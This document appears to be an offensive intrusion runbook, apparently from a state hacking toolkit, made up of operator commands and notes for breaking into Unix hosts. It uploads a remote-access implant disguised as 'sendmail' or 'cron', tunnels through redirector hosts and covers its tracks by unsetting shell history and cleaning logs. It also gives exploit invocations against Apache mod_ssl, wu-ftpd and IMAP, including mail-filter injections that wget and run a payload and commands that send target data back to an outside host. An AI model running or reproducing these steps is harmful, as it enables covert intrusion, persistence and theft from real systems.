#### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root #### CONNECT (or has scrubhands already done this for you?) phone start #### REDIAL (if using same ISP and still have floppy this is faster) redial #### TCPDUMP cd /current/down script -af tcpdump.raw date; pwd; uname -a; ifconfig -a tcpdump -ni ppp0 tcpdump -ni eth0 #### WORKING WINDOWS (also use "myenv" at any local prompt for pastables) xterm & cd /current/down script -af script.$$ DISPLAY=:0.0 PS1="\t \h \w> " PATH=../bin:/current/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin export DISPLAY PS1 PATH; date; pwd; uname -a; netstat -rn ; ifconfig -a #### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root #### TOUCH (see also -nslookup -trace -ping and -icmptime from a NOPEN redirector) nslookup some.target.ip nslookup 1.2.3.4 nslookup -query=mx target.ip nslookup -query=mx 1.2.3.4 ping -nc 5 1.2.3.4 traceroute 1.2.3.4 traceroute -n 1.2.3.4 # or with ICMP traceroute -I 1.2.3.4 #### INC #### See ourtn's many many options, to include new triggers ourtn -h ourtn -H #### Get on up there ourtn -ue 1.2.3.4 # if that one fails you have wrong ip maybe or try this tn.spayed 1.2.3.4 #### INC TUNNEL (OLD WAY) tunnel -localport 80 -tunnel FIRSTIP:port -target FIRSTIP -target SECONDIP #### INC ONLY (no NOPEN) ourtn 1.2.3.4 #### What to do? w # either make a working dir mkdir /tmp/socket-root && cd /tmp/socket-root && chmod 0700 . # or just use /tmp if deleting immediately... cd /tmp && ls -arlt && pwd ~~p ../up/noserver sendmail chmod 700 sendmail && netstat -an | grep 40019.*LISTEN || (PATH=. D="-l 40019" sendmail && rm sendmail) ; ls -arlt # ps -- choose one or more echo p | crash ps -ef ps -efwww pa auxwww # NOPEN for business... (should not need if using ourtn -ue, and # also can be found via didthis if using ourtn) cd /current/down ../bin/noclient 1.2.3.4:40019 #### JL without jackpop redirector suntelnet.sh 1.2.3.4 LOCALIP 23064 /tmp/socket-root sendmail 13 40019 #### JL with -jackpop # Don't forget: -jackpop does not like its old windows # existing still on later tries. -jackpop 1.2.3.4 13 REDIRECTIP 23064 ###################################################### BEGIN -jackpop/nopen one-port ###################################################### BEGIN -jackpop/nopen one-port ###### ## NOTE: If problems (like lost connections) occur midstream with this method, ## look for our processes stranded on target (uudecode, sendmail, ## pt). If INCISION blessed, these will be hidden processes that will ## show up in a NOPEN =psdiff command as HIDDEN. ###### ###### ## JL via single available port (13 and 25 will both work) and ## run NOPEN session via that port too. ## Use this when JL trigger port is one and only port in or out. ###### ###### ## LOCALLY Start this in a scripted window. ## The local poptop will connect to 8080 down below. ###### myenv noclient -l 8080 ###### ## LOCAL PREP (can do from any local dir--paste complete blocks) ## Some of these you willl not use, FYI. ###### ## Unalias cp since these prompt otherwise unalias cp ## Make sure this is right noserver packrat -l sendmail /current/up/noserver ## Equivalently, do this step by step if you want: ## cp /current/up/noserver /current/up/sendmail ## compress -c /current/up/sendmail > /current/up/sendmail.Z ## chmod 755 /current/up/noserver /current/up/sendmail* ## uuencode /current/up/sendmail.Z sendmail.Z > /current/up/sendmail.Z.uu ## pick right poptop cp /current/up/poptop.i586-pc-linux-gnu /current/up/pt sum -s /current/up/pt /current/up/sendmail chown 0:0 /current/up/pt* /current/up/sendmail* tar -C /current/up -cvf /current/up/u.tar sendmail pt compress -c /current/up/u.tar > /current/up/u.tar.Z uuencode /current/up/u.tar.Z u.tar.Z > /current/up/u.tar.Z.uu ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver" ## Following should contain both sendmail and pt tar tvzf /current/up/u.tar.Z ## Only need this if not using the "mostly automated" method below gedit /current/up/u.tar.Z.uu& ## Probably don't need the rest unless target has no tar or uncompress: uuencode /current/up/pt pt > /current/up/pt.uu uuencode /current/up/sendmail sendmail > /current/up/sendmail.uu uuencode /current/up/u.tar u.tar > /current/up/u.tar.uu gedit /current/up/*.uu& ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver" ###### -jackpop 1.2.3.4 13 REDIRECTIP 23064 ## Option 3 run command on target. ## Choose offset if needed, and IN bless or not as desired. 3 ############################################ ###### EITHER CHOOSE THIS COMMAND ## Mostly automated method--only works if you uudecode is on target. ## AND YOU DO NOT GET AN INTERACTIVE SHELL--until NOPEN is up and ## running, that is. (The environment syntax here will fail on csh ## or tcsh, e.g. with FreeBSD.) ## ## If this fails (due to missing uudecode, for example), you will ## be dropped into a shell, instead. ###### ## IF this next line comes back with OOPS you are in an interactive shell and ## something failed with the command (wrong shell? uudecode/uncompress not there?) ## ##NON-ICESKATE METHOD (using poptop): ## ##stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sleep 5;uudecode&&uncompress u.tar.Z&&tar xf u.tar&&PATH=. D=-l40019 sendmail&&rm -f sendmail u.tar&&PATH=. exec pt 40019)||(echo OOPS&&exec sh) ## #### ## MODIFIED SINCE NO POPTOP AVAILABLE IN OP ## ## stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sleep 5;uudecode&&uncompress sendmail.Z&&PATH=. D=-l40019 ./sendmail&&rm -f sendmail)||(echo OOPS&&exec sh) ## ###### OR CHOOSE THIS COMMAND############### ## More Manual method, gives interactive shell--WHOSE CONTENTS GO ACROSS IN THE CLEAR. ###### # Command to run (some prep, then exec shell): cd /tmp ; ls -arlt ; mkdir -p /tmp/socket-root ; cd /tmp/socket-root ; ls -alrt ; pwd ; exec sh ########################## ###### ## That pops up a window connecting to port 13 ###### #################################### IF USING MOSTLY AUTOMATED CHOICE ABOVE ###### ## REMOTE in popped up shell window ###### ## If using port 25 as your JL port, you have to quit out of the SMTP ## negotiation before continuing. quit ## This causes local spawn program to push up /current/up/u.tar.Z.uu if ## it exists, but it can also take an argument of what uuencoded/ascii ## file to push up with: ## --p (defaults to /current/up/u.tar.Z.uu ) ## --p /current/up/someotherfile ## ## MODIFIED SINCE NO POPTOP AVAILABLE IN OP ## ## --p /current/up/sendmail.Z.uu ## Continue after seeing the traffic for the upload ## stop in the NOPEN/-jackpop window. ## This "--- " string causes the remote and local poptop programs to ## synch up to the waiting NOPEN server and client and should cause ## the NOPEN listener locally to start its connection to the target. --- ## Answer "A" to abort the autodone on the first NOPEN connection. ## Let autodone complete in one of your new windows you start up via ## the -tunnel command that follows after "END IF" A ## Clean up (files should be gone already, might have working directory still) -lt -cd /tmp -rm /tmp/socket-root ## The "sh -c stty -echo;..." process can and must be killed ps -ef | grep stty kill -9 THATPID ## After that, just "pt 40019" and "sendmail" processes remain ## and must stay until end of op ps -ef ## Continue below after the "END IF" line similar to this "ELSE IF" one. #################################### ELSE IF USING MANUAL CHOICE ################ #### WARNING: #### This popped up shell window must be exited with "exit" and NOT ^D. #### If you exit with ^D the sh and maybe other processes will be #### stranded and not die cleanly. ################ ###### ## This is important: without it the paste to the uudecode fails, but ## otherwise it doesn't do much visibly. ###### stty -echo # We use this shell to upload poptop and noserver. # But first...(paste the whole bunch) unset HISTFILE unset HISTSIZE unset HISTFILESIZE type perl uudecode uncompress tar # if the type command fails try: which perl uudecode uncompress tar ###### ## no uudecode but we do have perl on target? ###### ## LOCALLY run one of these (brings up new tab in gedit--use it) ## if uncompress on target uudecode.pastable /current/up/u.tar.Z u.tar.Z ## if not uudecode.pastable /current/up/u.tar u.tar ###### ## LOCALLY select the gedit tab for what you want to ## paste up there (based on whether uncompress is there) ## Then middle-click paste it into target window. ###### ###### ## REMOTE--choose whatever makes sense--all should be safe ###### ls -arlt uncompress *Z for i in *tar ; do tar xvf $i ; done ls -arlt ls sendmail pt && rm u.tar* ###### ## REMOTE -- Time to run NOPEN (and it inherits this session via pt) ###### # Start server listening and connect to it via poptop # (you should see "tty should be setup...") PATH=. D=-l40019 sendmail PATH=. pt 40019 # Typing this next "--- " string activates poptop here and # there to connect a local noclient to the remote noserver # via this already established TCP session. --- ###### ## FINI - clean up a bit ###### ## Once NOPEN is up and running, both the previous hop's ## noclient window where -jackpop was run and the shell ## window it popped up will be tied up until we're done ## on the jackladder'd target. ###### -cd /tmp -ls /tmp/socket-root rm -rf /tmp/socket-root #################################### END IF (CHOICE OF WHICH, MANUAL OR AUTO?) # Op away.... # AUTODONE ?? Skip the autodone stuff in your first window on target, # since that NOPEN session things the target's IP is 127.0.0.1. # Instead, use the multiple window -tunnel trick below. In tnose # new noclient windows on target, the correct target IP is used # for all of the autodone stuff. ######################## ## Need multiple NOPEN windows? This is the only way... ######################## ###### ## REMOTE start thistunnel ###### -tunnel l 40019 1.2.3.4 40019 ###### ## LOCALLY as many times as you need windows ###### noclient -c "-cd /tmp" 127.0.0.1:40019 ###### Bailing ## First, -exit any NOPEN sessions you started via the -tunnel, ## close that tunnel and quit out of -tunnel. ## ## Burn the NOPEN server. Post -burn/BURN on the new nopen, ## the popped up window should exit on its own. Use the "DONE" ## in the -jackpop window then. ###### -burn BURN DONE ######################################################## END -jackpop/nopen one-port ######################################################## END -jackpop/nopen one-port #### JL with uploaded jackpop binary (way old way) RA=REDIRECTIP RP=43122 \ TA=1.2.3.4 TP=13 \ sgitelnet.sh REDIRECTIP REDIRECTIP 23064 \ /tmp/socket-root sendmail 43122 40019 #### Upload jackpop before pasting command to redirector ~~p ../bin/jackpop jp #### in NOPEN window on redirector you'll need -rtun 23064 #### Now paste in the "chmod 700 && ....." command sgitelnet.sh gave you #### CONNECT #### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root ../bin/noclient 1.2.3.4:40019 -nstun 1.2.3.4 40019 -rm sendmail #### GOT ROOT? -gs info # AT JOB cd /; echo "rm -rf /tmp/socket-root > /dev/null 2>&1" | at now + 180 minutes at -l; date mx :%s/^at -r .*$/ at -r #### /g `x #### SURVEY -gs survey df -k -find some.find -lsh egrep '(tftpboot|cisco|router|hack|\.\.\.|tacac|ssh)' cmdout/some-find -lsh egrep '(trip|twz|tw.config|aset)' cmdout/some-find #### GO FREESTYLE #### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root ### ### BEGIN USER.MISSION File user.mission.generic.COMMON (see also ../etc/user.mission.generic.COMMON) ### ############- TOUCH #only from redirector **SKIP** nslookup domain nslookup ip nslookup -query=mx domain_name nslookup -query=mx domain_name ############- on solaris pingflag is -s ping IP TTL OS 2 - 32 Windows for Workgroups 2 - 32 Windows 95 34 - 64 Red Hat Linux (< version 6.0) 34 - 64 Digital UNIX 34 - 64 SCO 98 - 128 Windows NT 98 - 128 Windows 95 w/MS Dialup Network Upgrade 98 - 128 Windows 98 225 - 255 UNIX Note: recent Sun OS 5.9 boxes TTL 34-64. ################### PITCHIMPAIR INSTRUCTIONS ###################################### ### ### begin user.mission.pitchimpair ### ### get rid of pesky spaces at beginning of lines (fixes pasted html) :%s/^[ ]*//g :1 ### Set up variables. Use the next section for reference. ## Description Typical Value Actual Value This OP ## --------------- ------------- -------------------- ## local-ip: LOCAL_IP ## pitch-ip: PITCH_IP ## target-ip: TARGET_IP ## target-name: TARGET_NAME ## target-domain: TARGET_DOMAIN ## netcat-port: random NETCAT_PORT ## rat-port: nopen port RAT_PORT ## rat-name: sendmail RAT_NAME ## work-dir: .scsi WORK_DIR # Make the changes here. Use the above for reference if you need it. ####################################################################### # # Need a new userlist ? # # -ls /global/m*/MB/*/*/*/mailinfo.dat > L:/current/down/userlist # # (N.B. the -ls will give the mailinfo.dat file timestamps in the # format expected by lsstamp ... see next command) # # ## now, LOCALLY run lsstamp userlist > userlist.sorted # ## (lsstamp will sort the -ls lines in date order) # # Collection: -get /global/m1/MB/96/8/karachi:moftec/mailinfo.dat # # ####################################################################### mx :%s/LOCAL_IP/LOCALIP/g :%s/PITCH_IP/PITCH_IP/g :%s/TARGET_IP/TARGET_IP/g :%s/TARGET_NAME/TARGET_NAME/g :%s/TARGET_DOMAIN/TARGET_DOMAIN/g :%s/NETCAT_PORT/38745/g :%s/RAT_PORT/RAT_PORT/g :%s/RAT_NAME/sendmail/g :%s/WORK_DIR/.scsi/g :%s/mm-dd-yyyy/mm-dd-yyyy/g `x ### Use this if we already own the target: ### Create /current/etc/hops.txt file HOP1: PITCH_IP:R -lue HOP2: TARGET_IP:R -uec ############ Set up nopen for access ### ### start upload in another window cd /current/up file noserver* cp noserver.[sparc] noserver ### using NOPEN file noserver* packrat NETCAT_PORT # cp noserver sendmail; compress -c sendmail | uuencode sendmail.Z > sendmail.uu # ls -l sendmail.uu* # nc -l -p NETCAT_PORT < sendmail.uu ### Filters out "last" command on initial ops on the target echo "last" > /current/etc/autofilter.TARGET_NAME.TARGET_IP # or echo "last" > /current/etc/autofilter.TARGET_NAME.TARGET_DOMAIN.TARGET_IP ### in setting up windows, you probably want this ### td is an alias on HURRICANE and TYPHOON to set up a TCPDUMP xterm on right screen td cd /current/down script -a windows.tcpdump tcpdump -i eth0 -n -n ### in addition to this (which scrubhands may have given you) td cd /current/down script -a tcpdump.raw tcpdump -i ppp0 -n -n ### Use something similar to this for annoying packets in the red tcpdump: ### Paste in a non-scripted window: echo "pathcost" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters echo "NetBeui" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters echo "who-has" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters echo "router" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters ### if done via PITCHIMPAIR infrastructure: ### ### Get onto INCISION host: ### # if using hops.txt: ourtn # if using commandline: ourtn -uel PITCH_IP # or ourtn -ue PITCH_IP TARGET_IP ourtn -eulc -o RAT_PORT PITCH_IP TARGET_IP DISPLAY= export DISPLAY ./ftshell ./tn.spayed PITCH_IP ### or ./ftshell ourtn PITCH_IP ### Check for our PID (shouldn't see it) ps -ef|grep ### See who's on w ; date ### Check for anything mucking with /tmp ps -ef | grep \/tmp df -k dmesg ### Create working directory - first make sure /tmp doesn't have it already ls -al /tmp cd /tmp; ls -al pwd ### check things out a bit... ls -lart /etc | tail -30 ; uname -a ; date ; ifconfig -a ; w ### maybe check logs? ls -lart /var/adm /var/log ### look for sniffers etc ps -ef|grep #### ### upload RAT ~~p ../up/noserver.sparc sendmail ls -al chmod 700 sendmail && netstat -an | grep RAT_PORT PATH=. D="-l RAT_PORT" sendmail && rm sendmail && ls -alrt ### in a local window, connect to pitchimpair via nopen, and start tunnels #### ### Ex: noclient 217.53.1.2:39222 cd /current/down noclient PITCH_IP:RAT_PORT #-readrc ../etc/norc.solaris ######################################## # INCISION to FreeBSD implant ######################################## # from local LINUX scripted window export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$" ourtn -lue PITCH_IP -irtun 219.238.199.144 RANDOM_PORT -z -s 80 setenv D -lNOPEN_PORT # NO = sign and use setenv set path = (. /usr/bin /bin) # NO QUOTES and use set ~~p /current/up/noserver cron # freebsd noserver which cron cron # from NOPEN on the PITCHIMPAIR host: -nstun 219.238.199.144:NOPEN_PORT -cd /tmp -lt -rm cron -lt ------------------------------------- export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$" ourtn -lz TARGET_IP # or -irtun TARGET_IP PORT -lz setenv D -lNOPEN_PORT # NO = sign and use setenv set path = (. /usr/bin /bin) # NO QUOTES and use set ~~p /current/up/noserver crond # freebsd noserver which crond crond noclient TARGET_IP:NOPEN_PORT or -nstun TARGET_IP NOPEN_PORT ######################################## # JACKLADDER ######################################## ### can be done without a redirector and will upload and execute nopen jacktelnet.sh TARGET_IP LOCAL_IP NETCAT_PORT WORK_DIR RAT_NAME [JACKPORT] ######################################## # JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT) ######################################## ### Local window, let this sit and wait: ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1 ### on PITCH: set up window for nopen callback -nrtun 113 ### on PITCH: set up tunnel for nopen upload -tunnel r NOPEN_UPLOAD_PORT ### on PITCH, run jackpop to tickle incision -jackpop 202.38.128.1 110 211.40.103.194 13732 #3 run a command /dev/ttyia2 PITCH_IP 443 yes ### let incision bless the commands ### incision will talk to your local window, then callback to your -nrtun window ################################################### ### REDIRECTING IN THRU WINDOWS ################################################### ################## SENDING TRIGGER THRU WINDOWS (2000 or XP) BOX ########################## ##### NT4.0 doesn't allow the use of raw sockets, which is needed to send the IN trigger ## mx :%s/LOCAL_WINDOWS_IP/LOCAL_WINDOWS_IP/g :%s/LOCAL_UNIX_IP/LOCAL_UNIX_IP/g :%s/UNIX_INCISION_TRIGGER_PORT/UNIX_INCISION_TRIGGER_PORT/g :%s/INCISION_CALLBACK_PORT/INCISION_CALLBACK_PORT/g :%s/NOPEN_CALLBACK_PORT/NOPEN_CALLBACK_PORT/g :%s/WIN_TARG_INTERNAL_IP/10.140.0.9/g :%s/TARGET_IP/10.140.0.40/g `x ## Usage: script unixredirect.eps LOCAL-WINDOWS-IP LOCAL-UNIX-IP UNIX-INCISION-TRIGGER-PORT INCISION-CALLBACK-PORT NOPEN-CALLBACK-PORT script unixredirect.eps LOCAL_WINDOWS_IP LOCAL_UNIX_IP UNIX_INCISION_TRIGGER_PORT INCISION_CALLBACK_PORT NOPEN_CALLBACK_PORT ### or run the following by hand ### On Windows box ##################### # Note: can use 'background' instead of 'monitor' in the windows commands # This sends the trigger: # monitor packetredirect -packettype tcp -listenport LOCAL-PORT -bind LOCAL-WIN-IP # Ex. - monitor packetredirect -packettype tcp -listenport 32654 -bind DOOBIEIP monitor packetredirect -packettype tcp -listenport LOCAL_PORT -bind LOCAL_WIN_IP # This listens for the ish callback # monitor redirect -tcp -implantlisten ISH-CALLBACK-PORT -target LOCAL-LINUX-IP ISH-CALLBACK-PORT # Ex. - monitor redirect -tcp -implantlisten 28345 -target FIREBALL_IP 28345 monitor redirect -tcp -implantlisten ISH_CALLBACK_PORT -target LOCAL_LINUX_IP ISH_CALLBACK_PORT # For nopen connection: # monitor redirect -tcp -lplisten RAT-PORT # Ex. - monitor redirect -tcp -lplisten 47108 monitor redirect -tcp -lplisten RAT_PORT -target TARGET_IP RAT_PORT -bind LOCAL_WIN_IP # For additional nopen connections, increment the lplisten port, but keep the same target nopen port: # monitor redirect -tcp -lplisten RAT-PORT+1 -target TARGET-IP RAT-PORT -bind LOCAL-WIN-IP # Ex. - monitor redirect -tcp -lplisten 47109 -target 10.1.1.3 47108 -bind 10.1.1.2 # Ex. - monitor redirect -tcp -lplisten 47110 -target 10.1.1.3 47108 -bind 10.1.1.2 monitor redirect -tcp -lplisten RAT_PORT+1 -target TARGET_IP RAT_PORT -bind LOCAL_WIN_IP ### On Linux box: ##################### # Once the first three windows commands are set up, you can send the trigger: # ourtn -W LOCAL-WIN-IP:LOCAL-PORT -o RAT-PORT -p ISH-CALLBACK-PORT -i WIN-TARG-IP -ue TARGET-IP # Ex: ourtn -W DOOBIE_IP:32654 -o 47108 -p 28345 -i 10.1.1.4 -ue 10.1.1.3 #ourtn -W LOCAL_WIN_IP:LOCAL_PORT -o RAT_PORT -p ISH_CALLBACK_PORT -i WIN_TARG_IP -ue TARGET_IP #ourtn -W 192.168.254.253:31413 -O 41611 -C 202.154.225.27 -p 37541 -i 202.154.225.27 -ue 10.140.0.40 #ourtn -ueW 192.168.254.253:31413 -i 202.154.225.27 -C 202.154.225.27 -p 37541 -O 41611 10.140.0.40 TRAVOLTA=1 ourtn -ueW 192.168.254.22:8942 -i 10.140.0.9 -C 10.140.0.9 -p 18855 -O 7549 10.140.0.40 ### Use the TRAVOLTA option to keep nopen from dying in 5 hours, only if you think the op will be extended ### If alien has issues with an nfs mount point, so use the "-Q" option to ourtn and DO NOT run the following ### -lt /, df -k, otherwise, you'll tie up your window and will need to kill the process; ### it's better NOT to run nopen built-ins on alien so that you can kill something if it hangs incision trigger = UNIX_INCISION_TRIGGER_PORT incision callback = INCISION_CALLBACK_PORT nopen callback = NOPEN_CALLBACK_PORT #ourtn -ueW 192.168.254.142:36541 -i 10.140.0.9 -C 10.140.0.9 -p 34789 -O 45665 10.140.0.40 #ourtn -ueW LOCAL-WIN-IP:LOCAL-PORT -i WIN-TARG-IP -C WIN-TARG-INTERNAL-IP -p ISH-CALLBACK-PORT -O RAT-PORT TARGET-IP ourtn -ueW LOCAL_WINDOWS_IP:UNIX_INCISION_TRIGGER_PORT -i WIN_TARG_INTERNAL_IP -C WIN_TARG_INTERNAL_IP -p INCISION_CALLBACK_PORT -O NOPEN_CALLBACK_PORT TARGET_IP noclient -l NOPEN_CALLBACK_PORT #noclient -l 45665 # Call forward to nopen works to alien, start a -listen PORT to call forward # Set up redirectors on windows side to allow the following connections: mx :%s/NOPEN_CALLFORWARD_PORT/NOPEN_CALLFORWARD_PORT/g 'x # on windows side: background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT -target TARGET_IP NOPEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+1 -target TARGET_IP NOPEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+2 -target TARGET_IP NOPEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP -listen NOPEN_CALLFORWARD_PORT noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT #noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+1 #noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+2 #### To kill one server first use it to start a new one (new one won't burn) D=-l23477 PATH=. sendmail -burnBURN # Connect to nopen; suggest using the port override option (-o) above for simplicity # For additional windows, you and the windows person must increment the redirected port # Ex. - noclient 10.1.1.2:47108 # Ex. - noclient 10.1.1.2:47109 #noclient 10.1.1.2:RAT_PORT+1 ########################################################### # YES - for HPUX ########################################################### ./yes 127.0.0.1 100083 1 PROGRAM_PORT 0x40062ea8 'mkdir /tmp/.scsi;cd /tmp/.scsi && /usr/bin/telnet PITCH_IP NETCAT_PORT &1 > /dev/null 2>&1 && uncompress -f sendmail.Z;chmod 0700 sendmail && export D=-cPITCH_IP:NOPEN_PORT && ./sendmail' ########################################################### # CUP ########################################################### -gs wearcup -h ### to have it cleanup in 3 hours: -gs wearcup -r -w 3h ### to have it cleanup in 2 minutes: -gs wearcup -r -w 120s ### or, run it by hand: ### locally, edit cup, and change the working dir, and time in minutes to wait for execution ### upload cup -put /current/up/cup.DEPRECATED.SEE.README.cup.NOPEN cup -cat cup ### run cup ./cup & ps -ef |grep sleep ### You can kill the sleep to make it execute immediately, or just let ### it run normally -exit #### DO NOT -burn !!!!!!!!! USE -exit INSTEAD!!!!!!!!!! ########################################################### # HP Kernel Checks ########################################################### # run these to check target for kernel info for implants: /usr/bin/getconf SC_CPU_VERSION /usr/bin/getconf SC_KERNEL_BITS kmadmin -s ######################################################### # EVENLESSON ######################################################### # runs against Linux systems running Apache with mod_ssl accessing # OpenSSL 0.9.6d or earlier on x86 architectures # May not work first time; Try increasing the number of connections to the target by 6. # If this fails, try increasing the number of connections by 4 until you reach 40. # SHould give you prompt on system - may have to elevate #-scan 443 TARGET_IP -scan http TARGET_IP -scan ssl TARGET_IP ### Redirector: -tunnel l 443 TARGET_IP r NETCAT_PORT ### query target: ./apache-ssl-linux_v3 -i 127.0.0.1 ./apache-ssl-linux -i -s ### Usage: # Usage: ./apache-ssl-linux <-i hostname> [-s scan banner] [-t arch] [-p port] [-n ] [-a 0x
] ### Usage for default values: ./apache-ssl-linux -i TARGET_IP -t ARCH ### Usage for increasing number of connections to increase chances ./apache-ssl-linux -i TARGET_IP -t ARCH -n 20 #### get ptrace, forkpty, and nopen tarball ready to send: cd /current/up cp ptrace pt cp noserver sendmail cp forkpty fp tar cvf 1u.tar pt sendmail fp uuencode 1u.tar 1u.tar > 1u.tar.uu nc -l -p NETCAT_PORT < 1u.tar.uu #### to elevate and also get nopen there: cd /tmp mkdir .scsi cd .scsi telnet LOCAL_IP NETCAT_PORT > src Connection closed by foreign host. ls -la uudecode src ls -la tar xvf 1u.tar ls -la chmod 700 fp sendmail pt ./fp #### at sh-prompt, type: tty ./pt id PATH=. sendmail ##### Cleanup /var/log/httpd/error_log ########################################################### # EYEMASK ########################################################### ### Imap masqerade ### Bring a local to get root ### for solaris nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1 noclient -l 25 telnet TARGET_IP 143 A000 LOGIN user password A001 EXAMINE /etc/mail/sendmail.cf A002 FETCH 1 RFC822 A003 EXAMINE /etc/passwd A004 FETCH 1 RFC822 A003 EXAMINE /etc/shells A004 FETCH 1 RFC822 A005 EXAMINE .forward A006 CREATE .forward A007 CREATE .forward A008 APPEND .forward (\Seen) {145} "| /bin/ksh -c '/bin/cat/tmp/sendmail;chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'" A009 DELETE .forward A010 LOGOUT telnet PITCH_IP 25 HELO helo MAIL FROM: user@itt.beta.net RCPT TO: user@itt.beta.net DATA . QUIT # echo -e "HTTP/1.0 200\n" > new # cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail # nc -v -l -p 53 < sendmail # noclient -l 25 telnet TARGET_IP 143 A000 LOGIN user password A001 EXAMINE /etc/mail/sendmail.cf A002 FETCH 1 RFC822 A003 EXAMINE /etc/passwd A004 FETCH 1 RFC822 A003 EXAMINE /etc/shells A004 FETCH 1 RFC822 A100 LIST /etc/smrsh * A005 EXAMINE .forward A006 CREATE .forward A007 CREATE .forward A008 APPEND .forward (\Seen) {11} "| slocal" A100 CREATE .maildelivery A101 APPEND .maildelivery (\Seen) {37} To user pipe A >/home/user/.g A102 LIST "" % A102 RENAME .g .procmailrc A008 APPEND .procmailrc (\Seen) {128} :0 c |cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f sendmail A009 DELETE .forward A009 DELETE .maildelivery A009 DELETE .procmailrc A010 LOGOUT telnet localhost 25 HELO helo MAIL FROM: user@localhost.localdomain RCPT TO: user@localhost.localdomain DATA . QUIT telnet fawn 143 A000 LOGIN user password A001 EXAMINE /etc/mail/sendmail.cf A002 FETCH 1 RFC822 A003 EXAMINE /etc/passwd A004 FETCH 1 RFC822 A003 EXAMINE /etc/shells A004 FETCH 1 RFC822 A102 LIST "/usr/bin/X11" % A005 EXAMINE .forward A006 CREATE .forward A007 CREATE .forward A008 APPEND .forward (\Seen) {50} "| /usr/bin/*11/xterm -display PITCH_IP:26000" A009 DELETE .forward A010 LOGOUT telnet fawn 25 HELO helo MAIL FROM: user@fawn.beta.net RCPT TO: user@fawn.beta.net DATA . QUIT ### cleanup possible logging in /var/adm/messages (should blend in if it fails) ########################################################### # EXPOUNDATOM ########################################################### # Requires the target to have the wu-2.6.1 FTP service running # Requires anonymous ftp access (determined if exploit works) # -scan ftp TARGET_IP # A maximum of two tries can be attempted. # # Syntax # ./wu-261-linux -h # For target list: # ./wu-261-linux -t0 -h # No redirection: ./wu-261-linux TARGET_IP 21 VERSION # w/ redirection: -tunnel l 21 TARGET_IP # Locally: ./wu-261-linux -a -d 127.0.0.1 ./wu-261-linux -t17 -d 127.0.0.1 # SHould give you root; need to upload nopen unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd which uudecode uncompress # gedit sendmail uudecode; ls -latr uncompress sendmail.Z ls -la chmod 700 sendmail PATH=. sendmail # IF it complains about the user/pass correct, then it's not vulnerable to # our pair that we try to send it; # Cleanup: # /var/log/messages (look for ftp access) # /var/adm/utmpx, wtmpx # /var/log/secure ################################################### ### EMBERSNOUT ################################################### # must verify that box is RH9.0(SHRIKE) and that # httpd is "Apache/2.0.40 (Red Hat Linux) -scan telnet TARGET_IP -scan ssh TARGET_IP -scan ssl TARGET_IP # Notes: # this indicates it's RH9.0 but could be either Psyche or Shrike: # (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003) # seeing this indicates (Shrike) because the version is bundled with it: # SH-1.99-OpenSSH_3.5p1 # this version of Apache is needed but Psyche comes with 2.0.40-8 and # Shrike comes with 2.0.40-21; the release in not determinable from # a scan; just verify it's what is expected: # Server: Apache/2.0.40 (Red Hat Linux) # # op box should work - depends if python is included rpm -qf /usr/bin/python # should see: python-base-2.2-9mdk # if you want it to pop an xterm back to your screen: # - make sure 6000 is listening # - run xhost + ./es.py Arguments: ['./es.py'] Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd" where... ip............target IP address port..........target httpd TCP port number (usually 443) packet_size...attack packet length in bytes start_ebp.....guessed %ebp value to start with end_ebp.......guessed %ebp value to end with ebp_inc.......how many stack bytes to bump %ebp each time hex_pad_byte..packet filling byte (0x0 will do randomized fill) "cmd".........ASCII command string to be executed on target ### Locally netstat -an |grep 6000 xhost + ########### REDIRECTED: ### Redirector: -tunnel l 443 TARGET_IP r 6006 127.0.0.1 6000 r NETCAT_PORT ### In a local scripted window, set up a netcat to listen for a connection: nc -vv -l -p NETCAT_PORT ### Locally (choose a method): ### This one will send command results back to a netcat window (not interactive) ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/ bin/telnet PITCH_IP NETCAT_PORT" ### This one gives you an interactive window: ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh&0 2>&0)" # or for ksh: ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh 